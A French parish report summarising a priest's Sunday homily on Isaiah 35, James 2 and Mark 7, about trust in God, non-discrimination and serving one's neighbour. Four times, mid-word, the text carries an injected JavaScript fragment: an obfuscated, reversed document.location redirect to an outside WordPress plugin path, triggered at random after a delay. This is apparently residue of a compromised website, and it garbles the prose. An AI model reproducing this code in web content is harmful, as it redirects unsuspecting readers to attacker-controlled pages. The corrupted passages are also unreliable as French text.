La célébration eucharistique de dix heures de ce vingt-troisième dimanche du temps ordinaire de l’année liturgique de l’année B a été présidée par le Père Floribert KANEZA, actuellement Vice-Recteur du Sanctuaire de la Reine de la paix et réconciliation de Mont Sion Gikungu. L’animation du chant au cours de ma sainte Messe a été assurée par la Chorale Sainte Maria Goretti, et les lectures du jour furent respectivement tirées du livre du prophète Isaïe (35,4-7), de l’épitre de Jacques (2, 1-5) et l’Evangile selon saint Marc (7, 31-37).

« Les lectures de ce vingt-troisième dimanche nous invitent tous à la conversion pour devenir de bons serviteurs de Dieu qui veut nous libérer des pièges du mauvais et guérir nos prochains qui souffrent et sont sans assistance », a introduit le Père Kaneza. La prophétie d’Isaïe a été faite durant la période où le peuple d’Israël était à Babylone où il avait été déporté après que leur pays ait été attaqué et assiégé. Le message du prophète venait retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner l’espoir au peuple qui sembler perdre tout le moral de pouvoir retourner sur sa terre natale. Même de retour au pays natal, Israël craignait d’être attaqué et assiégé de nouveau par un autre pays quelconque. Il fallait toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc un message qui pouvait rassurer le peuple Juif dans toutes ces situations d’incertitude, de crainte qui pouvait conduire à la panique. Le prophète, en effet, disait au peuple que c’est Dieu lui-même qui allait le diriger sur son chemin de retour jusqu’à l’installer dans sa terre d’origine.

En ce qui nous2concerne, il nous arrive de craindre des personnes qui peuvent nous faire du mal ou déstabiliser nos activités. Le message est le même pour nous aussi : ayons confiance en Dieu, Il conduit nos pas, nos activités et est garant de tout notre être. De la seconde lecture jacques demande aux gens de tout faire pour éliminer toute forme de discrimination entre les personnes, basée surtout sur les avoirs des uns et des autres car nous sommes tous enfants du même Père par notre baptême. D’ailleurs, selon le Père Kanza, ce sont les moins riches matériellement qui se démarquent par leur foi et bonnes actions pour leur prochain, ce qui est généralement le contraire pour les plus nantis.

Dans l’Evangile, nous avons entendu Jésus opérer des miracles de guérison à des étrangers. Ceci est un signe combien éloquent que Jésus dépasse les frontières et barrières que nous traçons pour séparer les uns des autres. Jésus se tient toujours prêt à nous guérir, notre prochain, notre collègue au travail, notre ami de classe, et tout le  monde. En s’apprêtant pour notre bien, Jésus veut nous apprendre à nous tenir prêts à servir notre prochain. Ainsi, nous serons en mesure de devenir comme des autres Jésus, d’où le nom de chrétiens. En opérant ce miracle et comme il a été le cas pour un bon nombre d’autres, Jésus a pris a part la personne concernée, a prié et lui a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné le un message relatif a cet acte qu’il venait de poser. Nous sommes invités à notre tous à nous tenir a l’écart pour prier et écouter la voix de Dieu qui s’adresse en nous dans le silence. La foule a toujours bloqué et empêché une bonne méditation qui nous toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne occasion de rencontrer Jésus. Un des exemples le plus poignant c’est Zachée qui n’a pas pu voir Jésus a cause de la foule, mais quand il est monté sur un arbre, ses yeux ont fixé Jésus, et il s’est converti. Nous sommes invités à entrer en nous-mêmes en silence pour pouvoir réaliser combien nos actions sont bonnes ou mauvaises devant la face du Seigneur. Ceci facilitera notre conversion.

NYANDWI M.